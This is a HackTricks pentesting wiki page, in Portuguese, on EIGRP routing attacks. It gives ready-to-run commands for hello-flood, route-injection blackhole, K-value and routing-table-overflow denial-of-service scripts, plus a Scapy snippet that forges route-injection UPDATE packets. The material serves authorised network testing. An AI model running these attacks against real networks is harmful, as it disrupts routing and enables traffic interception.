Ataques EIGRP

Tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks

Este é um resumo dos ataques expostos em https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9. Consulte-o para mais informações.

Ataque de Vizinhos Falsos EIGRP

  • Objetivo: Sobrecarregar as CPUs dos roteadores ao inundá‑los com pacotes HELLO do EIGRP, potencialmente causando um ataque de Negação de Serviço (DoS).
  • Tool: helloflooding.py script.
  • Execution:
~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24
  • Parameters:
  • --interface: Especifica a interface de rede, ex.: eth0.
  • --as: Define o número do sistema autônomo (AS) do EIGRP, ex.: 1.
  • --subnet: Define a subrede alvo, ex.: 10.10.100.0/24.

Ataque Blackhole EIGRP

  • Objetivo: Interromper o fluxo de tráfego da rede injetando uma rota falsa, levando a um blackhole onde o tráfego é direcionado a um destino inexistente.
  • Tool: routeinject.py script.
  • Execution:
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
  • Parameters:
  • --interface: Especifica a interface do sistema do atacante.
  • --as: Define o número AS do EIGRP.
  • --src: Define o endereço IP do atacante.
  • --dst: Define o IP da subrede alvo.
  • --prefix: Define a máscara (prefixo) do IP da subrede alvo.

Ataque de Abuso dos K-values

  • Objetivo: Criar desconexões e reconexões contínuas dentro do domínio EIGRP ao injetar K-values alterados, resultando efetivamente em um DoS.
  • Tool: relationshipnightmare.py script.
  • Execution:
~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100
  • Parameters:
  • --interface: Especifica a interface de rede.
  • --as: Define o número AS do EIGRP.
  • --src: Define o endereço IP de um roteador legítimo.

Ataque de Overflow da Tabela de Roteamento

  • Objetivo: Sobrecarregar a CPU e a RAM do roteador ao inundar a tabela de roteamento com numerosas rotas falsas.
  • Tool: routingtableoverflow.py script.
  • Execution:
sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50
  • Parameters:
  • --interface: Especifica a interface de rede.
  • --as: Define o número AS do EIGRP.
  • --src: Define o endereço IP do atacante.

Notas do Protocolo Úteis para Ataques

  • Pacotes HELLO carregam os K-values e vizinhanças só se formam quando eles batem. Esta é a base para ataques de mismatch de K-values/ruptura de relacionamento e explica por que K-values diferentes impedem adjacência.
  • O TLV PARAMETER (Type 0x0001) em HELLO (e no UPDATE inicial) carrega os K-values e o Hold Time, então capturas passivas revelam os valores exatos usados no segmento.

Criação de Pacotes com Scapy (Route Injection / Fake Neighbors)

Scapy inclui uma camada contrib EIGRP com TLVs como EIGRPParam e EIGRPIntRoute, o que é suficiente para confeccionar UPDATEs para injeção de rotas. Exemplo adaptado do davidbombal/scapy EIGRP route injection script:

from scapy.all import *
load_contrib("eigrp")

sendp(Ether()/IP(src="192.168.1.248", dst="224.0.0.10") /
EIGRP(opcode="Update", asn=100, seq=0, ack=0,
tlvlist=[EIGRPIntRoute(dst="192.168.100.0",
nexthop="192.168.1.248")]))

O mesmo repositório inclui scripts rápidos “fake neighbor” que capturam um pacote EIGRP real e o reproduzem com um spoofed source IP para criar vizinhos fantasma (útil para pressão na CPU/neighbor-table).

  • Scapy EIGRP contrib docs: https://scapy.readthedocs.io/en/latest/api/scapy.contrib.eigrp.html
  • Example scripts: https://github.com/davidbombal/scapy

Routopsy & NSE Helpers

  • Routopsy cria um laboratório de ataque com roteador virtual (FRRouting + Scapy) e inclui ataques DRP que você pode adaptar para testes EIGRP. https://sensepost.com/blog/2020/routopsy-hacking-routing-with-routers/
  • Nmap’s NSE has a small eigrp library for parsing/generating a subset of EIGRP packets. https://nmap.org/nsedoc/lib/eigrp.html

Authentication Recon

  • O modo nomeado do EIGRP suporta HMAC-SHA-256 authentication via authentication mode hmac-sha-256 .... Se ativado, pacotes forjados devem ser autenticados com a chave correta; se não estiver ativado, spoofing/injection é mais fácil de validar.

References

Tip

Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE) Aprenda e pratique Hacking Azure: HackTricks Training Azure Red Team Expert (AzRTE)

Supporte o HackTricks